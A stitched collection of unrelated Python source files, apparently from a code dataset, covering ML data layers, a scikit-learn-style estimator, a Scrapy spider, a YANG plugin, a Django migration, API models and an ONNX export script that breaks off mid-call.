return "/" + name.replace(DELIMITER, "_").replace("//", "/").strip("/")
def toCamelCase(string: str):
"""
Converts a string to camel case
Parameters
----------
string: str
The string to convert
"""
string = str(string)
if string.isupper():
return string
split = string.split("_") # split by underscore
final_split = []
for s in split:
final_split.extend(s.split(" ")) # split by space
return "".join(l.capitalize() if index > 0 else l for index, l in enumerate(final_split))
|
StarcoderdataPython
|
3208493
|
<reponame>harisankarh/NeMo
# Copyright (c) 2019 NVIDIA Corporation
from nemo.backends.pytorch.nm import DataLayerNM
from nemo.core.neural_types import *
from nemo.core import DeviceType
import torch
from .datasets import BertPretrainingDataset
class BertPretrainingDataLayer(DataLayerNM):
@staticmethod
def create_ports():
input_ports = {}
output_ports = {
"input_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_type_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"input_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_ids":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"output_mask":
NeuralType({
0: AxisType(BatchTag),
1: AxisType(TimeTag)
}),
"labels":
NeuralType({0: AxisType(BatchTag)}),
}
return input_ports, output_ports
def __init__(self, *, tokenizer, dataset, name, max_seq_length,
sentence_indices_filename=None, mask_probability=0.15,
**kwargs):
DataLayerNM.__init__(self, **kwargs)
self._device = torch.device(
"cuda" if self.placement in [DeviceType.GPU, DeviceType.AllGpu]
else "cpu"
)
self._dataset = BertPretrainingDataset(
tokenizer=tokenizer,
dataset=dataset,
name=name,
sentence_indices_filename=sentence_indices_filename,
max_length=max_seq_length,
mask_probability=mask_probability)
def __len__(self):
return len(self._dataset)
@property
def dataset(self):
return self._dataset
@property
def data_iterator(self):
return None
|
StarcoderdataPython
|
3378401
|
from typing import Callable, Iterable
import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin, RegressorMixin
from sklearn.linear_model import Ridge
from sklearn.metrics import r2_score
from sklearn.preprocessing import LabelBinarizer
from rvfln.activation import ActivationFunction, LeakyReLU
from rvfln.rvfln import RVFLNRegressor, matricise
class BLSRegressor(RVFLNRegressor):
"""
Broad Learning System estimator using ridge regression as its fitting procedure.
    The model uses Sklearn's API for ease of use.
(note: incremental fitting procedures may be implemented in the future once I'm smart enough to understand the paper)
----------
Attributes:
n_z: int - Number of mapped features
n_z_features: int - Number of features in each mapped feature
n_h: int - Number of enhancement nodes
activation_mapped_feature: ActivationFunction = LeakyReLU - Activation function for mapped features
activation_enhancement: ActivationFunction = LeakyReLU - Activation function for enhancement nodes
alpha: float = 0.5 - Regularization parameter of the ridge regression
Training data:
X: ndarray - Matrix containing the input of the network
Y: ndarray - Matrix containing the output of the network (if a vector is supplied, it is converted into a column vector)
Parameters:
We: ndarray - Random weights for the mapped features in the network shape=(n_z, input_features, n_z_features)
Be: ndarray - Random biases for the mapped features in the network shape=(n_z * n_z_features)
super(): RVFLNRegressor - The random vector functional link network this model is based on
"""
def __init__(
self,
n_z: int,
n_z_features: int,
n_h: int,
activation_mapped_feature: ActivationFunction = LeakyReLU,
activation_enhancement: ActivationFunction = LeakyReLU,
alpha: float = 0.5,
):
self.n_z = n_z
self.n_z_features = n_z_features
self.n_h = n_h
self.activation_mapped_feature = activation_mapped_feature
self.activation_enhancement = activation_enhancement
super().__init__(
n_enhancement=n_h, alpha=alpha, activation=activation_enhancement
)
def fit(self, X: np.ndarray, Y: np.ndarray):
X = matricise(X)
Y = matricise(Y)
if X is None:
raise ValueError(
"X is not a matrix or vector, please provide a matrix or vector"
)
if Y is None:
raise ValueError(
"Y is not a matrix or vector, please provide a matrix or vector"
)
self.input_features = X.shape[1]
self.output_features = Y.shape[1]
self.We = np.random.standard_normal(
size=(self.n_z, X.shape[1], self.n_z_features)
)
self.Be = np.random.standard_normal(size=(self.n_z_features * self.n_z))
Z = np.concatenate(X @ self.We, axis=1) + self.Be
Z = self.activation_mapped_feature(Z)
super().fit(Z, Y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
X = matricise(X)
if X is None:
raise ValueError(
"X is not a matrix or vector, please provide a matrix or vector"
)
if X.shape[1] != self.input_features:
raise ValueError(
"The supplied X has a different number of features from the one the model was fitted on."
)
if self.We is None:
raise ValueError(
"The model has not been fitted yet, please fit before trying to predict"
)
Z = np.concatenate(X @ self.We, axis=1) + self.Be
Z = self.activation_mapped_feature(Z)
return super().predict(Z)
    def score(self, X: np.ndarray, Y: np.ndarray) -> float:
Y = matricise(Y)
if Y is None:
raise ValueError(
"Y is not a matrix or vector, please provide a matrix or vector"
)
        return r2_score(Y, self.predict(X))
class BLSClassifier(BLSRegressor, ClassifierMixin):
"""
BLS Classifier using the Sklearn Classifier API.
----
Attributes:
n_z: int - Number of mapped features
n_z_features: int - Number of features in each mapped feature
n_h: int - Number of enhancement nodes
activation_mapped_feature: ActivationFunction = LeakyReLU - Activation function for mapped features
activation_enhancement: ActivationFunction = LeakyReLU - Activation function for enhancement nodes
alpha: float = 0.5 - Regularization parameter of the ridge regression
Training data:
X: ndarray - Matrix containing the input of the network
y: Iterable - sequence of labels
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def fit(self, X: np.ndarray, y: Iterable):
self.encoder = LabelBinarizer()
Y = self.encoder.fit_transform(y)
super().fit(X, Y)
return self
def predict(self, X: np.ndarray) -> np.ndarray:
Y = super().predict(X)
Y = np.around(Y)
y = self.encoder.inverse_transform(Y)
return np.array(y)
def score(self, X: np.ndarray, y: Iterable) -> float:
y_hat = self.predict(X)
y = np.array(y)
return sum(y == y_hat) / y.size
|
StarcoderdataPython
|
112855
|
import cv2
import gc
import numpy as np
from ctypes import *
__all__ = ['darknet_resize']
class IMAGE(Structure):
_fields_ = [("w", c_int),
("h", c_int),
("c", c_int),
("data", POINTER(c_float))]
lib = CDLL("darknet/libdarknet.so", RTLD_GLOBAL)
resize_image = lib.resize_image
resize_image.argtypes = [IMAGE, c_int, c_int]
resize_image.restype = IMAGE
free_image = lib.free_image
free_image.argtypes = [IMAGE]
@profile
def array_to_image(arr):
# share memory
arr = arr.transpose(2, 0, 1)
c, h, w = arr.shape[:3]
arr = np.ascontiguousarray(arr.flat, dtype=np.float32)
data = arr.ctypes.data_as(POINTER(c_float))
im = IMAGE(w, h, c, data)
return im, arr
@profile
def image_to_array(im, shape):
# share memory
# python won't free c objects
arr = np.ctypeslib.as_array(im.data, shape=(shape[2], shape[0], shape[1]))
arr = arr.transpose((1, 2, 0))
return arr
@profile
def darknet_resize(im, shape):
# shape: (h, w)
image, _ = array_to_image(im)
image_resize = resize_image(image, shape[1], shape[0])
image_resize_np = image_to_array(image_resize, shape)
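    # Caution: image_to_array returns a view over darknet-owned memory; copying it
    # (e.g. image_resize_np.copy()) here would avoid referencing memory that
    # free_image releases on the next line.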
free_image(image_resize)
return image_resize_np
@profile
def test_darknet_resize():
image_path = 'darknet/data/dog.jpg'
a = cv2.imread(image_path)
ar = darknet_resize(a, (416, 416, 3))
del a
del ar
gc.collect()
b = cv2.imread(image_path)
br = darknet_resize(b, (416, 416, 3))
del b
del br
gc.collect()
c = cv2.imread(image_path)
cr = darknet_resize(c, (416, 416, 3))
del c
del cr
gc.collect()
"""
image_resize_cv2 = cv2.resize(image, (416, 416), interpolation=cv2.INTER_LINEAR)
print(image_resize_cv2.shape)
"""
"""
python3 -m memory_profiler models/darknet_utils.py
"""
if __name__ == '__main__':
test_darknet_resize()
|
StarcoderdataPython
|
105388
|
<filename>appTests/TwitterCompetitionsBotTests.py
import unittest
import mock
from unittest.mock import call
from app.freemiumwebapp.adminConstants import AdminConstants
from app.freemiumwebapp.twitterHook import TwitterHook
from app.freemiumwebapp.TwitterCompetitionsBot import TwitterCompetitionsBot
class TwitterCompetitionsBotTests(unittest.TestCase):
admin_constants = AdminConstants()
queries = admin_constants.twitter_queries
def test_bot_can_init(self):
twitter_hook = TwitterHook()
bot = TwitterCompetitionsBot(twitter_hook)
self.assertIsNotNone(bot)
@mock.patch('app.freemiumwebapp.twitterHook.TwitterHook')
def test_bot_can_search_tweets_multiple_queries(self, twitter_hook):
bot = TwitterCompetitionsBot(twitter_hook)
bot.Run()
calls = []
for query in self.queries:
calls.append(call(query))
twitter_hook.search_by_query.assert_has_calls(calls)
@mock.patch('app.freemiumwebapp.twitterHook.TwitterHook')
def test_bot_can_retweet_competitions(self, twitter_hook):
test = ''
|
StarcoderdataPython
|
3326062
|
from dominion_object_model import object_model
class GameClient(object_model.GameClient):
"""Game represents the specific game domain
In this case Dominion
"""
def __init__(self, game):
self.game = game
def play_action_card(self, card_type):
return self.game.play_action_card(card_type)
def buy(self, card):
return self.game.buy(card)
def done(self):
self.game.done()
|
StarcoderdataPython
|
1778071
|
<reponame>chokoswitch/stellarstation-api
# Copyright 2019 Infostellar, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The integration tests for OpenSatelliteStream API in StellarStationService."""
from queue import Queue
from stellarstation.api.v1 import stellarstation_pb2
SATELLITE_ID = '98'
# This test checks the expected status after sending status change command.
def test_open_satellite_stream(stub_factory):
client = stub_factory.get_satellite_service_stub()
request_queue = Queue()
request_iterator = generate_request(request_queue)
expected_status = -1
for response in client.OpenSatelliteStream(request_iterator):
if response.HasField("receive_telemetry_response"):
telemetry_data = response.receive_telemetry_response.telemetry.data
assert len(telemetry_data) > 1
# The second last byte of the telemetry indicates the current status of the fake satellite used
            # in the test. The value is either 0 or 1.
is_safe_mode = int(telemetry_data[-2])
assert (is_safe_mode == 0 or is_safe_mode == 1)
if expected_status < 0:
# Set expected status based on the current value.
expected_status = 1 - is_safe_mode
# Send the command to toggle the state.
command = [bytes(b"\x01\x01")]
request_queue.put(command)
else:
assert is_safe_mode == expected_status
return
else:
gs_state = response.stream_event.plan_monitoring_event.ground_station_state
assert gs_state.HasField("antenna")
assert gs_state.antenna.azimuth.command == 1.0
assert gs_state.antenna.azimuth.measured == 1.02
assert gs_state.antenna.elevation.command == 20.0
assert gs_state.antenna.elevation.measured == 19.5
# Yields a request sent to the stream opened by OpenSatelliteStream.
def generate_request(queue):
# Send the first request to activate the stream. Telemetry will start
# to be received at this point.
yield stellarstation_pb2.SatelliteStreamRequest(satellite_id=SATELLITE_ID)
while True:
commands = queue.get()
command_request = stellarstation_pb2.SendSatelliteCommandsRequest(command=commands)
satellite_stream_request = stellarstation_pb2.SatelliteStreamRequest(
satellite_id=SATELLITE_ID,
send_satellite_commands_request=command_request)
yield satellite_stream_request
queue.task_done()
|
StarcoderdataPython
|
3207294
|
<reponame>einarnn/pyang-plugins
"""YANG output plugin"""
import optparse
import re
from pyang import plugin
from pyang import util
from pyang import grammar
def pyang_plugin_init():
plugin.register_plugin(StripPlugin())
class StripPlugin(plugin.PyangPlugin):
def add_output_format(self, fmts):
fmts['strip'] = self
self.handle_comments = True
def add_opts(self, optparser):
optlist = [
optparse.make_option("--strip-module", type=str,
dest="strip_module",
help="Colon-separated list of module names to strip out"),
optparse.make_option("--strip-yang-canonical",
dest="strip_yang_canonical",
action="store_true",
help="Print in canonical order"),
optparse.make_option("--strip-yang-remove-unused-imports",
dest="strip_yang_remove_unused_imports",
action="store_true"),
]
g = optparser.add_option_group("Strip output specific options")
g.add_options(optlist)
def emit(self, ctx, modules, fd):
module = modules[0]
ctx.opts.strip_module = ctx.opts.strip_module.split(':')
emit_yang(ctx, module, fd)
def emit_yang(ctx, module, fd):
emit_stmt(ctx, module, fd, 0, None, '', ' ')
_force_newline_arg = ('description', 'contact', 'organization')
_non_quote_arg_type = ('identifier', 'identifier-ref', 'boolean', 'integer',
'non-negative-integer', 'date', 'ordered-by-arg',
'fraction-digits-arg', 'deviate-arg', 'version',
'status-arg')
_kwd_class = {
'yang-version': 'header',
'namespace': 'header',
'prefix': 'header',
'belongs-to': 'header',
'organization': 'meta',
'contact': 'meta',
'description': 'meta',
'reference': 'meta',
'import': 'linkage',
'include': 'linkage',
'revision': 'revision',
'typedef': 'defs',
'grouping': 'defs',
'identity': 'defs',
'feature': 'defs',
'extension': 'defs',
'_comment': 'comment',
'module': None,
'submodule': None,
}
def get_kwd_class(keyword):
if util.is_prefixed(keyword):
return 'extension'
else:
try:
return _kwd_class[keyword]
except KeyError:
return 'body'
_keyword_with_trailing_newline = (
'typedef',
'grouping',
'identity',
'feature',
'extension',
)
def emit_stmt(ctx, stmt, fd, level, prev_kwd_class, indent, indentstep):
if ctx.opts.strip_module and stmt.keyword == 'import' and stmt.arg in ctx.opts.strip_module:
return
if isinstance(stmt.keyword, tuple):
kw_module, _ = stmt.keyword
if kw_module in ctx.opts.strip_module:
return
if ctx.opts.strip_yang_remove_unused_imports and stmt.keyword == 'import':
for p in stmt.parent.i_unused_prefixes:
if stmt.parent.i_unused_prefixes[p] == stmt:
return
if util.is_prefixed(stmt.raw_keyword):
(prefix, identifier) = stmt.raw_keyword
keyword = prefix + ':' + identifier
else:
keyword = stmt.keyword
kwd_class = get_kwd_class(stmt.keyword)
if ((level == 1 and
kwd_class != prev_kwd_class and kwd_class != 'extension') or
stmt.keyword in _keyword_with_trailing_newline):
fd.write('\n')
if keyword == '_comment':
emit_comment(stmt.arg, fd, indent)
return
fd.write(indent + keyword)
if stmt.arg != None:
if keyword in grammar.stmt_map:
(arg_type, _subspec) = grammar.stmt_map[keyword]
if arg_type in _non_quote_arg_type:
fd.write(' ' + stmt.arg)
else:
emit_arg(stmt, fd, indent, indentstep)
else:
emit_arg(stmt, fd, indent, indentstep)
if len(stmt.substmts) == 0:
fd.write(';\n')
else:
fd.write(' {\n')
if ctx.opts.strip_yang_canonical:
substmts = grammar.sort_canonical(stmt.keyword, stmt.substmts)
else:
substmts = stmt.substmts
if level == 0:
kwd_class = 'header'
for s in substmts:
emit_stmt(ctx, s, fd, level + 1, kwd_class,
indent + indentstep, indentstep)
kwd_class = get_kwd_class(s.keyword)
fd.write(indent + '}\n')
def emit_arg(stmt, fd, indent, indentstep):
"""Heuristically pretty print the argument string"""
# current alg. always print a double quoted string
arg = stmt.arg
arg = arg.replace('\\', r'\\')
arg = arg.replace('"', r'\"')
arg = arg.replace('\t', r'\t')
lines = arg.splitlines(True)
if len(lines) <= 1:
if len(arg) > 0 and arg[-1] == '\n':
arg = arg[:-1] + r'\n'
if stmt.keyword in _force_newline_arg:
fd.write('\n' + indent + indentstep + '"' + arg + '"')
else:
fd.write(' "' + arg + '"')
else:
fd.write('\n')
fd.write(indent + indentstep + '"' + lines[0])
for line in lines[1:-1]:
fd.write(indent + indentstep + ' ' + line)
# write last line
fd.write(indent + indentstep + ' ' + lines[-1])
if lines[-1][-1] == '\n':
# last line ends with a newline, indent the ending quote
fd.write(indent + indentstep + '"')
else:
fd.write('"')
def emit_comment(comment, fd, indent):
lines = comment.splitlines(True)
for x in lines:
if x[0] == '*':
fd.write(indent + ' ' + x)
else:
fd.write(indent + x)
fd.write('\n')
|
StarcoderdataPython
|
1690699
|
import datetime
from .base import BandoriObject
###############################################################################
# Bandori Database models
class DCard(BandoriObject):
'''
Represents a bang dream card
'''
def __init__(self, data: dict, id_name='cardId', region='en/'):
super().__init__(data, id_name, region)
self.character_id = data.get("characterId")
self.rarity = data.get("rarity")
self.attribute = data.get("attr")
self.skill_id = data.get("skillId")
self.title = data.get("title")
self.level_limit = data.get("levelLimit")
self.res_link = (self.URL_GA_RES
+ '/assets/characters/resourceset/'
+ data.get("cardRes")
+ '_rip/'
)
self.image = self.res_link + 'card_normal.png'
self.image_trained = self.res_link + 'card_after_training.png'
self.trim = self.res_link + 'trim_normal.png'
self.trim_trained = self.res_link + 'trim_after_training.png'
self.live2d_link = (self.URL_GA_RES
+ '/assets/characters/livesd/'
+ data.get("live2dRes")
+ '_rip/'
)
self.chibi = self.live2d_link + 'sdchara.png'
self.costume_id = data.get("costumeId")
self.released_at = data.get("releasedAt")
self.min_stats = data.get("simpleParams").get("min")
self.max_stats = data.get("simpleParams").get("max")
def get_skill(self):
d = self._api_get(url=self.URL_GA + 'skill/' + str(self.skill_id),
party=False
)
return DSkill(data=d, region=self.region)
class DSkill(BandoriObject):
'''
Represents a Card's skill.
'''
def __init__(self, data: dict, id_name='skillId', region='en/'):
super().__init__(data, id_name, region)
self.skill_level = data.get("skillLevel")
self.duration = data.get("duration")
self.short_description = data.get("simpleDescription")
self.description = data.get("description")
self.skill_type = data.get("skillSortType")
class DMember(BandoriObject):
'''
Represents a bang dream member.
Referred to as Character in bandori database.
'''
def __init__(self, data: dict, id_name='characterId', region='en/'):
super().__init__(data, id_name, region)
self.character_type = data.get("characterType")
self.band_id = data.get("bandId")
self.name = data.get("characterName")
self.ruby = data.get("ruby")
self.detailed_data = self._api_get(id=[self.id],
url=self.URL_GA+'chara/')
class DDegree(BandoriObject):
'''
Represents a ranking from bang dream event.
'''
def __init__(self, data: dict, id_name='degreeId', region='en/'):
super().__init__(data, id_name, region)
self.seq = data.get("seq")
self.image_name = data.get("imageName")
self.degree_rank = data.get("degreeRank")
self.degree_name = data.get("degreeName")
self.degree_type = data.get("degreeType")
self.icon = data.get("iconImageName")
self.description = data.get("description")
class DComic(BandoriObject):
'''
Represents a loading screen koma.
'''
def __init__(self, data: dict,
id_name='singleFrameCartoonId', region='en/'):
super().__init__(data, id_name, region)
self.title = data.get("title")
self.asset_name = data.get("assetBundleName")
self.seq = data.get("seq")
self.subTitle = data.get("subTitle")
self.asset_link = (self.URL_GA_RES
+ data.get("assetAddress")
)
class DStamp(BandoriObject):
'''
Represents a stamp
'''
def __init__(self, data, id_name='stampId', region='en/'):
super().__init__(data, id_name=id_name, region=region)
self.seq = data.get("seq")
self.image_link = (self.URL_GA_RES
+ '/stamp/01_rip/'
+ data.get("imageName")
+ '.png'
)
self.type = data.get("stampType")
class DBand(BandoriObject):
'''
Represents a bang dream band
'''
def __init__(self, data: dict, id_name='bandId', region='en/'):
super().__init__(data, id_name, region)
self.name = data.get("bandName")
self.introduction = data.get("introductions")
self.type = data.get("bandType")
self.members = [data.get("leader", -5), data.get("member1", -5),
data.get("member2", -5), data.get("member3", -5),
data.get("member4", -5)]
# Note: bands past Roselia have messed up members.
def get_band_members(self):
d = self._api_get(id=self.members,
url=self.URL_GA+'chara/',
party=False)
return [DMember(data) for data in d]
class DSong(BandoriObject):
'''
Represents a playable song in bang dream
'''
def __init__(self, data: dict, id_name='musicId', region='en/'):
super().__init__(data, id_name, region)
self.title = data.get("title")
self.bgm = self.URL_GA_RES + data.get("bgmFile", '')
self.thumb = self.URL_GA_RES + data.get("thumb", '')
self.jacket = self.URL_GA_RES + data.get("jacket", '')
self.band_name = data.get("bandName")
self.band = data.get("bandId")
self.difficulty = data.get("difficulty")
self.how_to_get = data.get("howToGet")
self.achievements = data.get("achievements")
self.published_at = data.get("publishedAt")
self.closed_at = data.get("closedAt")
self.composer = data.get("composer")
self.lyricist = data.get("lyricist")
self.arranger = data.get("arranger")
class DGacha(BandoriObject):
'''
Represents a gacha in bang dream
'''
def __init__(self, data: dict, id_name='gachaId', region='en/'):
super().__init__(data, id_name, region)
self.name = data.get("gachaName")
self.start_date = data.get("publishedAt")
self.end_date = data.get("closedAt")
self.description = data.get("description")
self.rates = data.get("rates")
self.annotation = data.get("annotation")
self.gacha_period = data.get("gachaPeriod")
self.sub_name = data.get("gachaSubName")
self.type = data.get("gachaType")
def get_start_date(self):
return datetime.datetime.fromtimestamp(int(self.start_date) / 1000)
def get_end_date(self):
return datetime.datetime.fromtimestamp(int(self.end_date) / 1000)
class DEvent(BandoriObject):
'''
Represents an event in bang dream
'''
def __init__(self, data, id_name='eventId', region='en/'):
super().__init__(data, id_name=id_name, region=region)
self.type = data.get("eventType")
self.name = data.get("eventName")
self.asset_name = data.get("assetBundleName")
self.start_date = data.get("startAt")
self.end_date = data.get("endAt")
self.enabled = data.get("enableFlag")
self.bgm_asset_name = data.get("bgmAssetBundleName")
self.bgm_file_name = data.get("bgmFileName")
self.point_rewards = data.get("pointRewards")
self.rank_rewards = data.get("rankingRewards")
self.detail = data.get("detail")
|
StarcoderdataPython
|
1666427
|
import uuid
def get_mac():
mac_num = hex(uuid.getnode()).replace('0x', '').upper()
mac = '-'.join(mac_num[i: i + 2] for i in range(0, 11, 2))
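    # Note: this assumes the hex string has exactly 12 digits; a node id whose leading
    # byte is zero would need zero-padding, e.g. '{:012X}'.format(uuid.getnode()).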
return mac
print (get_mac())
|
StarcoderdataPython
|
1785606
|
import subprocess
import tempfile
import os
def _exec_notebook(path):
with tempfile.NamedTemporaryFile(suffix=".ipynb") as fout:
args = ["jupyter", "nbconvert", "--to", "notebook", "--execute",
"--ExecutePreprocessor.timeout=None",
"--output", fout.name, path]
subprocess.check_call(args)
def test():
_exec_notebook('examples/Example1_CentralPeak.ipynb')
_exec_notebook('examples/Example2_Band_Peak_Power.ipynb')
_exec_notebook('examples/Example3_CorrelationCoefficient.ipynb')
#name_examples = os.listdir('examples')
# for ex in name_examples:
# _exec_notebook('examples/'+ex)
"""Option 2"""
# jupyter nbconvert --ExecutePreprocessor.timeout=1000 --to notebook --execute examples/Example1_CentralPeak.ipynb
|
StarcoderdataPython
|
3291816
|
<reponame>hurek/peeker_bot
from telegram.ext import CallbackQueryHandler, CommandHandler, ConversationHandler, Filters, MessageHandler
from conversations.announce import announce, send_announce
from conversations.conv_utils import ANNOUNCE, CHAT_TIMEOUT, STORE_ADDRESS, WAIT_FEEDBACK, cancel, \
chat_timeout
from conversations.feedback import feedback, send_feedback
from conversations.keyboards import SKIP_TUTORIAL, TUTORIAL_ENTRY, NEW_NAME, RENAME, TUTORIAL_STEP_TWO
from conversations.my_adresses import incorrect_name, new_operator_name, rename_operator_address
from conversations.new_address import add_address, incorrect_address, store_address
from conversations.tutorial import get_started, tutorial_entry, tutorial_step_two
class RenameOperatorHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[CallbackQueryHandler(rename_operator_address, pattern='^' + str(RENAME) + '$')],
states={
NEW_NAME: [MessageHandler(Filters.regex('^([a-zA-Z0-9 ]{1,40}$)'), new_operator_name),
MessageHandler(Filters.text, incorrect_name)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)],
)
class NewAddressHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[MessageHandler(Filters.regex('^(📝New Address)$'), add_address)],
states={
STORE_ADDRESS: [MessageHandler(Filters.regex('^(0x[a-fA-F0-9]{40})'), store_address),
MessageHandler(Filters.regex('^(⬅️Back)$'), cancel),
MessageHandler(Filters.text, incorrect_address)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)],
)
class AnnounceHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[CommandHandler("announce", announce)],
states={
ANNOUNCE: [MessageHandler(Filters.regex('^(⬅️Back)$'), cancel),
MessageHandler(Filters.text, send_announce)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)],
)
class FeedbackHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[MessageHandler(Filters.regex('^(📨Feedback)$'), feedback)],
states={
WAIT_FEEDBACK: [MessageHandler(Filters.regex('^(⬅️Back)$'), cancel),
MessageHandler(Filters.text, send_feedback)],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CommandHandler('cancel', cancel), MessageHandler(Filters.regex('^(⬅️Back)$'), cancel)]
)
class UserGuideHandler(ConversationHandler):
def __init__(self):
super().__init__(
entry_points=[CallbackQueryHandler(tutorial_entry, pattern='^' + str(TUTORIAL_ENTRY) + '$'),
CallbackQueryHandler(get_started, pattern='^' + str(SKIP_TUTORIAL) + '$'),
CommandHandler('tutorial', tutorial_entry)],
states={
TUTORIAL_STEP_TWO: [CallbackQueryHandler(tutorial_step_two, pattern='^' + str(TUTORIAL_STEP_TWO) + '$')],
ConversationHandler.TIMEOUT: [MessageHandler(Filters.text | Filters.command, chat_timeout)],
},
conversation_timeout=CHAT_TIMEOUT,
fallbacks=[CallbackQueryHandler(get_started, pattern='^' + str(SKIP_TUTORIAL) + '$')]
)
|
StarcoderdataPython
|
1769629
|
<gh_stars>0
import scrapy
import re
from skindl.items import SkinItem
class MinecraftskinsSpider(scrapy.Spider):
name = 'minecraftskins'
allowed_domains = ['www.minecraftskins.net']
start_urls = ['http://www.minecraftskins.net/']
def parse(self, response):
for content in response.xpath('//div[@class="row grid"]'):
skinItem = SkinItem()
            for skin in content.xpath('.//div[@class="card"]'):
                # use relative ('.//') selectors so each card only yields its own fields
                skinItem['title'] = skin.xpath('.//h2[@class="card-title"]/text()').getall()
                skinItem['description'] = skin.xpath('.//p[@class="card-description"]/text()').getall()
                skinItem['designer'] = skin.xpath('.//h3[@class="card-designer"]/text()').getall()
                skinItem['preview_url'] = skin.xpath('.//div[@class="card-image"]//img/@src').getall()
                skinItem['preview_url'] = [response.urljoin(re.sub("front_preview","preview",u)) for u in skinItem['preview_url']]
                skinItem['skin_url'] = skin.xpath('.//div[@class="card-controls clearfix"]//a[2]/@href').getall()
skinItem['skin_url'] = [response.urljoin(u) for u in skinItem['skin_url']]
yield skinItem
### Get Next page if available ###
# next_page = response.xpath('//a[@class="next-page"]/@href').get()
# if next_page is not None:
# next_page = response.urljoin(next_page)
# yield scrapy.Request(next_page, callback=self.parse)
##### alternate
for href in response.xpath('//a[@class="next-page"]/@href'):
yield response.follow(href, callback=self.parse)
|
StarcoderdataPython
|
161756
|
# Generated by Django 2.0 on 2019-07-07 02:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('pages', '0005_accessanalysis'),
]
operations = [
migrations.CreateModel(
name='CategoryTools',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'verbose_name': '工具分类关联',
'verbose_name_plural': '工具分类关联',
},
),
migrations.CreateModel(
name='Tool',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='工具名')),
('cover', models.TextField(blank=True, default=None, null=True, verbose_name='封面')),
('cover_type', models.CharField(blank=True, choices=[('LINK', ''), ('TEXT', '')], default=None, max_length=55, null=True, verbose_name='封面类型')),
('intro', models.TextField(blank=True, default=None, null=True, verbose_name='简介')),
('detail', models.TextField(blank=True, default=None, null=True, verbose_name='详细(使用)介绍')),
('index', models.IntegerField(default=1, verbose_name='排序索引')),
('display', models.BooleanField(default=True, verbose_name='是否显示')),
],
options={
'verbose_name': '工具',
'verbose_name_plural': '工具',
},
),
migrations.CreateModel(
name='ToolCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='分类名')),
('index', models.IntegerField(default=1, verbose_name='排序索引')),
('display', models.BooleanField(default=True, verbose_name='是否显示')),
('tools', models.ManyToManyField(through='pages.CategoryTools', to='pages.Tool')),
],
options={
'verbose_name': '工具分类',
'verbose_name_plural': '工具分类',
},
),
migrations.AddField(
model_name='categorytools',
name='category',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pages.ToolCategory'),
),
migrations.AddField(
model_name='categorytools',
name='tool',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='pages.Tool'),
),
]
|
StarcoderdataPython
|
3273371
|
<gh_stars>10-100
# The MIT License (MIT)
#
# Copyright (c) 2021 NVIDIA CORPORATION
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import torch
import torchvision.models as models
import argparse
import os
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--save", default="model.onnx")
args = parser.parse_args()
resnet50 = models.resnet50(pretrained=True)
dummy_input = torch.randn(1, 3, 224, 224)
resnet50 = resnet50.eval()
torch.onnx.export(resnet50,
dummy_input,
args.save,
export_params=True,
opset_version=10,
do_constant_folding=True,
input_names=['input'],
output_names=['output'],
